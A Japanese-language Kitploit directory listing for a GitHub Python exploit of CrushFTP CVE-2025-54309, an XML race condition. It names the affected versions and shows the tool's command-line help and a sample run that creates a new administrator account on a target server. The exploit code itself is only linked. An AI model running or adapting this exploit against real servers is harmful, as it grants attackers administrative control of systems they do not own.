Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CrushFTP_CVE-2025-54309 — CrushFTP CVE-2025-54309 XMLレースコンディション脆弱性のPythonエクスプロイト。設定可能なペイロードタイプとリクエスト数で、同時リクエストを介して管理者ユーザーを作成します。 | Kitploit
ツール/GitHubGitHub/chin-tech/crushftp_cve-2025-54309
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubchin-tech/crushftp_cve-2025-54309

CrushFTP_CVE-2025-54309

CrushFTP CVE-2025-54309 XMLレースコンディション脆弱性のPythonエクスプロイト。設定可能なペイロードタイプとリクエスト数で、同時リクエストを介して管理者ユーザーを作成します。

リポジトリを見る
161年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-54309 - CrushFTP

影響を受けるバージョン

  • < 10.8.5
  • < 11.3.4_34

watchtower によるレースコンディション PoC を、より拡張しやすいように調整しました。

python crushedftp.py
usage: crushedftp.py [-h] [-u USERNAME] [-p PASSWORD] [-r REQUESTS] [-P PAYLOAD] target

CrushFTP CVE-2025-54309 XML Race Condition Exploit

positional arguments:
  target                Target CrushFTP URL (e.g. http://ftp.myserver.poo)

options:
  -h, --help            show this help message and exit
  -u, --username USERNAME
                        username for user_create payload: (default: meow)
  -p, --password PASSWORD
                        password for user_create payload (default: meow!)
  -r, --requests REQUESTS
                        Number of request pairs (default: 5000)
  -P, --payload PAYLOAD
                        payload type
[*] Target: http://ftp.test.com
[*] New admin user: test:test
[*] PROGRESS: 50/5000 request pairs completed...
[+] Payload success!
Payload Success!
ツールをダウンロード